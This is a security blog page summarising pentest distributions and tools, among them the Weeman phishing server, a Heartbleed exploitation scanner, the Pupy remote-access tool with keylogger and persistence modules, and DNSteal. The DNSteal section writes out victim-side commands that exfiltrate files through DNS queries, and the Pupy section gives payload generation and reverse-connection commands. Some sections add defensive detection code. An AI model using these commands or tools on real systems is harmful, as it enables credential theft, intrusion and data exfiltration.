SECURITY EDUCATION, PRIVACY GUIDANCE, THREAT AWARENESS, OPEN SOURCE TOOLS, RESEARCH NOTES, AND RESPONSIBLE TECHNOLOGY CONTENT

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and information systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze. For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large number of cyber security tools. It is an open-source distro created especially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...

Tuesday, January 5, 2016

Faraday 1.0.15 - Collaborative Penetration Test and Vulnerability Management Platform




A brand new version is ready for you to enjoy! Faraday v1.0.15 (Community, Pro & Corp) was published today with new exciting features.

As part of our constant commitment to the IT sec community we added a tool that runs several other tools against all IPs in a given list. This results in a major scan of your infrastructure which can be done as frequently as necessary. Interested? Read more about it here.

This version also features three new plugins and a fix developed entirely by our community! Congratulations to Andres and Ezequiel for being the first two winners of the Faraday Challenge! Are you interested in winning tickets for Ekoparty as well? Submit your pull request or find us on freenode #faraday-dev and let us know.

Changes:

* Continuous Scanning Tool cscan added to ./scripts/cscan
* Hosts and Services views now have pagination and search



* Updates version number on Faraday Start
* Added Services columns to Status Report


* Converted references to links in Status Report. Support for CVE, CWE, Exploit Database and Open Source Vulnerability Database
* Added Pippingtom, SSHdefaultscan and pasteAnalyzer plugins

Fixes: 

* Debian install
* Saving objects without parent
* Visual fixes on Firefox



ZeroNet - Decentralized websites using Bitcoin crypto and BitTorrent network



Decentralized websites using Bitcoin crypto and the BitTorrent network - http://zeronet.io

Why?
  • We believe in open, free, and uncensored network and communication.
  • No single point of failure: a site remains online so long as at least 1 peer is serving it.
  • No hosting costs: Sites are served by visitors.
  • Impossible to shut down: It's nowhere because it's everywhere.
  • Fast and works offline: You can access the site even if your internet is unavailable.

Features
  • Real-time updated sites
  • Namecoin .bit domains support
  • Easy to setup: unpack & run
  • Clone websites in one click
  • Password-less BIP32-based authorization: your account is protected by the same cryptography as your Bitcoin wallet
  • Built-in SQL server with P2P data synchronization: Allows easier site development and faster page load times
  • Tor network support
  • TLS encrypted connections
  • Automatic UPnP port opening
  • Plugin for multiuser (openproxy) support
  • Works with any browser/OS

How does it work?
  • After starting zeronet.py you will be able to visit ZeroNet sites using http://127.0.0.1:43110/{zeronet_address} (e.g. http://127.0.0.1:43110/1EU1tbG9oC1A8jz2ouVwGZyQ5asrNsE4Vr).
  • When you visit a new ZeroNet site, it tries to find peers using the BitTorrent network so it can download the site files (html, css, js...) from them.
  • Each site you visit is then also served by you.
  • Every site contains a content.json which holds the sha512 hash of every other file and a signature generated using the site's private key.
  • If the site owner (who has the private key for the site address) modifies the site, then he/she signs the new content.json and publishes it to the peers. After the peers have verified the content.json integrity (using the signature), they download the modified files and publish the new content to other peers.
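The per-file check a peer performs after the content.json signature has been verified, as an added Python example (not ZeroNet's own code): build a content.json-style manifest with a sha512 hash and size per file, then verify a downloaded copy against it, rejecting tampered, missing and unlisted files. The site files and manifest layout are constructed for illustration; the signature over the manifest (ZeroNet signs it with the site's Bitcoin-style key) is not reproduced here.

```python
import hashlib
import json

# Constructed sample site files (not a real ZeroNet site).
SITE_FILES = {
    "index.html": b"<html><body>hello zeronet</body></html>",
    "js/app.js": b"console.log('hi');",
}


def build_manifest(files):
    """Build a content.json-style manifest: sha512 and size per file.
    The site owner would then sign the serialized manifest with the
    site key; that signing step is not reproduced here."""
    entries = {}
    for name, data in files.items():
        entries[name] = {"sha512": hashlib.sha512(data).hexdigest(),
                         "size": len(data)}
    return {"files": entries}


def verify_site(manifest, downloaded):
    """Check downloaded files against the manifest the way a peer would
    once the manifest signature is trusted. Returns a list of problems;
    an empty list means every file may be served to other peers."""
    problems = []
    listed = manifest["files"]
    for name, meta in listed.items():
        data = downloaded.get(name)
        if data is None:
            problems.append(f"missing: {name}")
            continue
        if len(data) != meta["size"]:
            problems.append(f"size mismatch: {name}")
        if hashlib.sha512(data).hexdigest() != meta["sha512"]:
            problems.append(f"hash mismatch: {name}")
    # Files that arrived but are not in the manifest are unsigned content
    # and must not be served.
    for name in downloaded:
        if name not in listed:
            problems.append(f"unlisted: {name}")
    return problems


if __name__ == "__main__":
    manifest = build_manifest(SITE_FILES)
    print(json.dumps(manifest, indent=2))
    print("clean copy:", verify_site(manifest, SITE_FILES))
    tampered = dict(SITE_FILES, **{"js/app.js": b"console.log('evil');"})
    print("tampered copy:", verify_site(manifest, tampered))
```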

How to join?

Windows
It downloads the latest version of ZeroNet then starts it automatically.

Alternative method for Windows by installing Python

Linux

Debian
  • sudo apt-get update
  • sudo apt-get install msgpack-python python-gevent
  • wget https://github.com/HelloZeroNet/ZeroNet/archive/master.tar.gz
  • tar xvpfz master.tar.gz
  • cd ZeroNet-master
  • Start with python zeronet.py
  • Open http://127.0.0.1:43110/ in your browser and enjoy! :)

Other Linux or without root access
  • Check your Python version with python --version; if the returned version is not Python 2.7.x, try the python2 or python2.7 command and use it from now on
  • wget https://bootstrap.pypa.io/get-pip.py
  • python get-pip.py --user gevent msgpack-python
  • Start with python zeronet.py

Mac
  • Install Homebrew
  • brew install python
  • pip install gevent msgpack-python
  • Download, Unpack, run python zeronet.py

Vagrant
  • vagrant up
  • Access VM with vagrant ssh
  • cd /vagrant
  • Run python zeronet.py --ui_ip 0.0.0.0
  • Open http://127.0.0.1:43110/ in your browser

Docker



Weeman - HTTP Server for Phishing




HTTP server for phishing in Python. Weeman has support for most of the (biggest) websites.
Usually you will want to run Weeman with a DNS spoof attack (see dsniff, ettercap).


Weeman will do the following steps:
  1. Create a fake HTML page.
  2. Wait for clients.
  3. Grab the data (POST).
  4. Try to log the client in to the original page.

Requirements
  • Python <= 2.7.
  • Python BeautifulSoup 4

Install BeautifulSoup
  • Archlinux - sudo pacman -S python2-beautifulsoup4
  • Ubuntu/Linuxmint - sudo apt-get install python-bs4
  • For another OS: - sudo pip install beautifulsoup4

Platforms
  • Linux (any)
  • Mac (Not tested)
  • Windows (Not tested)
[!] If weeman runs on your platform (Mac/Windows), please let me know.

Usage
Just type help

Run server:
  • For port 80 you need to run Weeman as root!
  • Host to clone (e.g. www.social-networks.local)
    set url http://localhost
  • Form action URL, i.e. the value of <form action="TAKE THIS URL"> (view the site source and take the URL)
    set action_url http://localhost/sendlogin
  • The port the Weeman server will listen on
    set port 2020
  • Start the server
    run

The settings will be saved for the next time you run weeman.py.



Heartbleed Vulnerability Scanner - Network Scanner for OpenSSL Memory Leak (CVE-2014-0160)




Heartbleed Vulnerability Scanner is a multiprotocol (HTTP, IMAP, SMTP, POP) CVE-2014-0160 scanning and automatic exploitation tool written in Python.

For scanning wide ranges automatically, you can provide a network range in CIDR notation and an output file to dump the memory leaked by vulnerable systems for later review.

Heartbleed Vulnerability Scanner can also get targets from a list file. This is useful if you already have a list of systems using SSL services such as HTTPS, POP3S, SMTPS or IMAPS.
git clone https://github.com/hybridus/heartbleedscanner.git

Sample usage

To scan your local 192.168.1.0/24 network for heartbleed vulnerability (https/443) and save the leaks into a file:
python heartbleedscan.py -n 192.168.1.0/24 -f localscan.txt -r

To scan the same network against SMTP over SSL/TLS and randomize the IP addresses:
python heartbleedscan.py -n 192.168.1.0/24 -p 25 -s SMTP -r

If you already have a target list which you created using nmap/zmap:
python heartbleedscan.py -i targetlist.txt

Dependencies

Before using Heartbleed Vulnerability Scanner, you should install python-netaddr package.

CentOS or CentOS-like systems:
yum install python-netaddr

Ubuntu or Debian-like systems:
apt-get install python-netaddr



Gryffin - Large Scale Web Security Scanning Platform


Gryffin is a large scale web security scanning platform. It is not yet another scanner. It was written to solve two specific problems with existing scanners: coverage and scale.

Better coverage translates to fewer false negatives. Inherent scalability translates to the capability of scanning and supporting a large, elastic application infrastructure: simply put, the ability to scan 1000 applications today and 100,000 applications tomorrow by straightforward horizontal scaling.

Coverage
Coverage has two dimensions - one during crawl and the other during fuzzing. In the crawl phase, coverage means being able to find as much of the application footprint as possible. In the scan phase, or while fuzzing, it means being able to test each part of the application for an applied set of vulnerabilities in depth.

Crawl Coverage
Today a large number of web applications are template-driven, meaning the same code or path generates millions of URLs. For a security scanner, it just needs one of the millions of URLs generated by the same code or path. Gryffin's crawler does just that.

Page Deduplication
At the heart of Gryffin is a deduplication engine that compares a new page with already seen pages. If the HTML structure of the new page is similar to those already seen, it is classified as a duplicate and not crawled further.
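An added Python illustration of the deduplication idea described above (not Gryffin's own Go implementation): each page is reduced to a structural fingerprint of its tag paths, text and attribute values ignored, and a new page whose fingerprint is at least `threshold` similar (weighted Jaccard) to one already seen is classified as a duplicate and not crawled further. The pages, the fingerprint form and the 0.9 threshold are assumptions for the example.

```python
from collections import Counter
from html.parser import HTMLParser


class TagPathExtractor(HTMLParser):
    """Collect the tag path (e.g. 'html/body/div/a') of every element.
    Text and attribute values are ignored: only structure matters."""
    VOID = {"br", "img", "input", "meta", "link", "hr"}

    def __init__(self):
        super().__init__()
        self.stack = []
        self.paths = Counter()

    def handle_starttag(self, tag, attrs):
        self.stack.append(tag)
        self.paths["/".join(self.stack)] += 1
        if tag in self.VOID:          # void elements never get an end tag
            self.stack.pop()

    def handle_endtag(self, tag):
        if tag in self.stack:         # tolerate sloppy, unclosed markup
            while self.stack and self.stack.pop() != tag:
                pass


def structure_fingerprint(html):
    parser = TagPathExtractor()
    parser.feed(html)
    return parser.paths


def structure_similarity(a, b):
    """Weighted Jaccard similarity of two fingerprints, in [0, 1]."""
    keys = set(a) | set(b)
    inter = sum(min(a[k], b[k]) for k in keys)
    union = sum(max(a[k], b[k]) for k in keys)
    return inter / union if union else 1.0


class PageDeduplicator:
    """Remember the fingerprint of every new page; a page whose structure
    is at least `threshold` similar to a seen one is a duplicate."""

    def __init__(self, threshold=0.9):
        self.threshold = threshold
        self.seen = []

    def is_duplicate(self, html):
        fp = structure_fingerprint(html)
        for other in self.seen:
            if structure_similarity(fp, other) >= self.threshold:
                return True
        self.seen.append(fp)
        return False
```

Two template-generated product pages that differ only in text and link targets share one fingerprint, so the crawler only needs to fuzz one of them.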

DOM Rendering and Navigation
A large number of applications today are rich applications. They are heavily driven by client-side JavaScript. In order to discover links and code paths in such applications, Gryffin's crawler uses PhantomJS for DOM rendering and navigation.

Scan Coverage
As Gryffin is a scanning platform, not a scanner, it does not have its own fuzzer modules, even for fuzzing common web vulnerabilities like XSS and SQL Injection.
It's not wise to reinvent the wheel where you do not have to. Gryffin at production scale at Yahoo uses open source and custom fuzzers. Some of these custom fuzzers might be open sourced in the future, and might or might not be part of the Gryffin repository.
For demonstration purposes, Gryffin comes integrated with sqlmap and arachni. It does not endorse them or any other scanner in particular.
The philosophy is to improve scan coverage by being able to fuzz for just what you need.

Scale
While Gryffin is available as a standalone package, it's primarily built for scale.
Gryffin is built on the publisher-subscriber model. Each component is either a publisher, or a subscriber, or both. This allows Gryffin to scale horizontally by simply adding more subscriber or publisher nodes.

Operating Gryffin

Pre-requisites
  1. Go
  2. PhantomJS, v2
  3. Sqlmap (for fuzzing SQLi)
  4. Arachni (for fuzzing XSS and web vulnerabilities)
  5. NSQ,
    • running lookupd at port 4160,4161
    • running nsqd at port 4150,4151
    • with --max-msg-size=5000000
  6. Kibana and Elastic search, for dashboarding

Installation
go get github.com/yahoo/gryffin/...

Run

TODO

  1. Mobile browser user agent
  2. Preconfigured docker images
  3. Redis for sharing states across machines
  4. Instruction to run gryffin (distributed or standalone)
  5. Documentation for html-distance
  6. Implement a JSON serializable cookiejar.
  7. Identify duplicate url patterns based on simhash result.


Pupy - Multi-Platform Remote Administration Tool


Pupy is an open-source, multi-platform Remote Administration Tool written in Python. On Windows, Pupy uses reflective DLL injection and leaves no traces on disk.

Features :
  • On Windows, the Pupy payload is compiled as a reflective DLL and the whole Python interpreter is loaded from memory. Pupy does not touch the disk :)
  • Pupy can reflectively migrate into other processes
  • Pupy can remotely import, from memory, pure Python packages (.py, .pyc) and compiled Python C extensions (.pyd). The imported Python modules do not touch the disk. (.pyd memory import currently works on Windows only; .so memory import is not implemented.)
  • modules are quite simple to write and Pupy is easily extensible.
  • Pupy uses rpyc and a module can directly access Python objects on the remote client
    • we can also access remote objects interactively from the Pupy shell and even auto-completion of remote attributes works!
  • the communication channel currently works as an SSL reverse connection, but a bind payload will be implemented in the future
  • all the non-interactive modules can be dispatched on multiple hosts in one command
  • Multi-platform (tested on Windows 7, Windows XP, Kali Linux, Ubuntu)
  • modules can be executed as background jobs
  • commands and scripts running on remote hosts are interruptible
  • auto-completion and nice colored output :-)
  • commands aliases can be defined in the config

Implemented Modules :
  • migrate (windows only)
    • inter process architecture injection also works (x86->x64 and x64->x86)
  • keylogger (windows only)
  • persistence (windows only)
  • screenshot (windows only)
  • webcam snapshot (windows only)
  • command execution
  • download
  • upload
  • socks5 proxy
  • local port forwarding
  • interactive shell (cmd.exe, /bin/sh, ...)
  • interactive python shell
  • shellcode exec (thanks to @byt3bl33d3r)

Quick start

In these examples the server is running on a Linux host (tested on Kali Linux) and its IP address is 192.168.0.1.
The clients have been tested on Windows 7, Windows XP, Kali Linux, Ubuntu and Mac OS X 10.10.5.

generate/run a payload
for Windows
./genpayload.py 192.168.0.1 -p 443 -t exe_x86 -o pupyx86.exe
you can also use -t dll_x86 or dll_x64 to generate a reflective DLL and inject/load it by your own means.

for Linux
pip install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

for MAC OS X
easy_install rpyc #(or manually copy it if you are not admin)
python reverse_ssl.py 192.168.0.1:443

start the server
  1. optionally edit pupy.conf to change the bind address / port
  2. start the Pupy server:
./pupysh.py

Some screenshots

list connected clients

help

execute python code on all clients

execute a command on all clients; the exception is retrieved in case the command does not exist

use a filter to send a module only on selected clients

migrate into another process

interactive shell

interactive python shell


example: How to write a MsgBox module

First of all, write the function/class you want to import on the remote client. In the example we create the file pupy/packages/windows/all/pupwinutils/msgbox.py:

import ctypes
import threading


def MessageBox(text, title):
    # MessageBoxA blocks until the box is closed, so run it in a daemon
    # thread to avoid blocking the rpyc connection.
    t = threading.Thread(target=ctypes.windll.user32.MessageBoxA,
                         args=(None, text, title, 0))
    t.daemon = True
    t.start()

Then simply create a module to load our package and call the function remotely:

from pupylib.PupyModule import *  # PupyModule, PupyArgumentParser, windows_only


class MsgBoxPopup(PupyModule):
    """ Pop up a custom message box """

    def init_argparse(self):
        self.arg_parser = PupyArgumentParser(prog="msgbox", description=self.__doc__)
        self.arg_parser.add_argument('--title', help='msgbox title')
        self.arg_parser.add_argument('text', help='text to print in the msgbox :)')

    @windows_only
    def is_compatible(self):
        pass

    def run(self, args):
        # push the package to the client from memory, then call it over rpyc
        self.client.load_package("pupwinutils.msgbox")
        self.client.conn.modules['pupwinutils.msgbox'].MessageBox(args.text, args.title)
        self.log("message box popped !")


Dependencies

rpyc (https://github.com/tomerfiliba/rpyc)

Roadmap and ideas

Some ideas without any priority order
  • support for https proxy
  • bind instead of reverse connection
  • add offline options to payloads like enable/disable certificate checking, embed offline modules (persistence, keylogger, ...), etc...
  • integrate scapy in the windows dll :D (that would be fun)
  • work on stealthiness and modules under unix systems
  • webcam snap
  • mic recording
  • socks5 udp support
  • remote port forwarding
  • perhaps write some documentation
  • ...
  • any cool idea ?


DNSteal - DNS Exfiltration tool for stealthily sending files over DNS requests



This is a fake DNS server that allows you to stealthily extract files from a victim machine through DNS requests.

Below is an image showing an example of how to use:


On the victim machine, you can simply do something like so:
for b in $(xxd -p file/to/send.png); do dig @server $b.filename.com; done
Support for multiple files
for filename in $(ls); do for b in $(xxd -p $filename); do dig +short @server $b.$filename.com; done; done
gzip compression supported
It also supports compression of the file to allow for faster transfer speeds; this can be achieved using the "-z" switch:
python dnsteal.py 127.0.0.1 -z
Then on the victim machine send a gzipped file like so:
for b in $(gzip -c file/to/send.png | xxd -p); do dig @server $b.filename.com; done
or for multiple, gzip compressed files:
for filename in $(ls); do for b in $(gzip -c $filename | xxd -p); do dig +short @server $b.$filename.com; done; done
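From the defender's side, the pattern above (hex chunks of a file carried as the leading labels of queries to one domain) is visible in DNS query logs. An added Python example, not part of DNSteal, that groups queries by registered domain and flags domains receiving many hex-prefixed queries; the log format ("client qname" per line), the sample lines and the thresholds are constructed for this illustration.

```python
import re
from collections import defaultdict

# Constructed sample DNS query log (not real traffic): "<client> <qname>".
SAMPLE_LOG = """\
10.0.0.5 www.example.com
10.0.0.5 89504e470d0a1a0a0000000d49484452.report.filename.com
10.0.0.5 000008000000080008060000003f3c1a.report.filename.com
10.0.0.5 0000001974455874536f667477617265.report.filename.com
10.0.0.5 cdn.example.net
10.0.0.7 4d4d4d4d.filename.com
10.0.0.5 0000000049454e44ae426082.report.filename.com
"""

# A label made only of hex digits and at least 8 characters long.
HEX_LABEL = re.compile(r"^[0-9a-f]{8,}$")


def registered_domain(qname):
    """Last two labels, e.g. 'filename.com' (a naive stand-in for a
    public-suffix-list lookup)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def hex_prefix_bytes(qname):
    """Bytes carried by the leading hex-looking labels, 0 if none."""
    total = 0
    for label in qname.lower().split("."):
        if not HEX_LABEL.match(label):
            break
        total += len(label) // 2
    return total


def find_exfil_domains(log_text, min_queries=3, min_bytes=32):
    """Group hex-prefixed queries by registered domain and flag domains
    that receive several of them carrying a meaningful amount of data."""
    stats = defaultdict(lambda: {"queries": 0, "bytes": 0, "clients": set()})
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 2:
            continue                      # skip malformed lines
        client, qname = parts
        carried = hex_prefix_bytes(qname)
        if carried == 0:
            continue
        entry = stats[registered_domain(qname)]
        entry["queries"] += 1
        entry["bytes"] += carried
        entry["clients"].add(client)
    return {domain: {"queries": s["queries"], "bytes": s["bytes"],
                     "clients": sorted(s["clients"])}
            for domain, s in stats.items()
            if s["queries"] >= min_queries and s["bytes"] >= min_bytes}
```

Tune the thresholds against your own baseline: some CDNs and anti-spam services legitimately use long hex labels, so the per-domain byte count over a time window is the more useful signal than any single query.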



Tiger - The Unix security audit and intrusion detection tool




Tiger is a security tool that can be used both as a security audit and as an intrusion detection system. It supports multiple UNIX platforms and it is free and provided under a GPL license. Unlike other tools, Tiger needs only POSIX tools and is written entirely in shell language.

Tiger has some interesting features that merit its resurrection, including a modular design that is easy to expand, and its double edge: it can be used as an audit tool and as a host intrusion detection system tool. Free Software intrusion detection is currently going many ways, from network IDS (with Snort), to the kernel (LIDS, or SNARE for Linux and Systrace for OpenBSD, for example), not to mention file integrity checkers (many of these: aide, integrit, samhain, tripwire...) and logcheckers (even more of these, check the Log Analysis pages). But few of them focus fully on the host side of intrusion detection. Tiger complements these tools and also provides a framework in which all of them can work together. Tiger is not a logchecker, nor is it focused on integrity analysis. It does "the other stuff": it checks the system configuration and status. Read the manpage for a full description of the checks implemented in Tiger. A good example of what Tiger can do is check_findeleted, a module that can determine which network servers running on a system are using deleted files (because libraries were patched during an upgrade but the servers' services were not restarted).
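An added Python illustration of the check_findeleted idea (not Tiger's own shell module): on Linux, a library that was replaced on disk while a process still maps the old copy shows up in /proc/<pid>/maps with a "(deleted)" suffix. The parser below runs over a constructed sample of such a file; the scan function applies it to every readable process. Pseudo-files that are always reported as deleted (memfd, /dev/zero, SysV shm) are skipped so they do not produce false positives.

```python
import os
import re

# Constructed sample of /proc/<pid>/maps for a daemon whose libssl was
# replaced on disk by a package upgrade (not captured from a real host).
SAMPLE_MAPS = """\
55d1c0000000-55d1c0020000 r-xp 00000000 08:01 131072 /usr/sbin/nginx
7f3a10000000-7f3a10200000 r-xp 00000000 08:01 262144 /usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)
7f3a10200000-7f3a10210000 rw-p 00200000 08:01 262144 /usr/lib/x86_64-linux-gnu/libssl.so.1.1 (deleted)
7f3a10300000-7f3a10400000 r-xp 00000000 08:01 262200 /usr/lib/x86_64-linux-gnu/libc.so.6
7f3a10500000-7f3a10501000 rw-p 00000000 00:00 0 /dev/zero (deleted)
7f3a10600000-7f3a10601000 rw-p 00000000 00:00 0 /memfd:shm (deleted)
7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0 [stack]
"""

# address perms offset device inode [pathname]
MAPS_LINE = re.compile(r"^\S+ \S+ \S+ (\S+) (\d+)(?: +(.*))?$")
DELETED = " (deleted)"


def deleted_mappings(maps_text):
    """Return the set of on-disk file paths that a process still maps
    although they have been deleted (typically replaced by an upgrade)."""
    deleted = set()
    for line in maps_text.splitlines():
        m = MAPS_LINE.match(line)
        if not m:
            continue
        device, inode, path = m.group(1), m.group(2), m.group(3) or ""
        if not path.endswith(DELETED):
            continue
        path = path[:-len(DELETED)]
        # Anonymous/pseudo mappings carry device 00:00 or inode 0 and are
        # always flagged "(deleted)"; they are not stale libraries.
        if device == "00:00" or inode == "0":
            continue
        if path.startswith(("/dev/", "/memfd:", "/SYSV")):
            continue
        deleted.add(path)
    return deleted


def scan_running_processes(proc="/proc"):
    """Walk /proc and map pid -> sorted deleted files it still uses.
    Other users' maps need privileges to read; unreadable ones are skipped."""
    report = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, pid, "maps")) as f:
                found = deleted_mappings(f.read())
        except OSError:
            continue
        if found:
            report[int(pid)] = sorted(found)
    return report


if __name__ == "__main__":
    for pid, files in sorted(scan_running_processes().items()):
        print(pid, *files)
```

A process listed here should be restarted so it picks up the patched library; the same check can be scheduled after every package upgrade.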

Installation
sudo apt-get install tiger



PEInjector - MITM PE file infector



The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features
  • Full x86 and x64 PE file support.
  • Open Source
  • Fully working on Windows and Linux, including automated installation scripts.
  • Can be operated on embedded hardware, tested on a Raspberry Pi 2.
  • On Linux, all servers will be automatically integrated as a service, no manual configuration required.
  • Plain C, no external libraries required (peinjector).
  • MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
  • Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
  • Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.
  • An awesome about page and much more, check it out.

Established in 2015. Offensive Sec Blog has been sharing security research, hacking tools, threat intelligence, and offensive security content since 2015.
Copyright © OffSec Blog | Powered by OffensiveSec
Design by OffSec | Built for the security community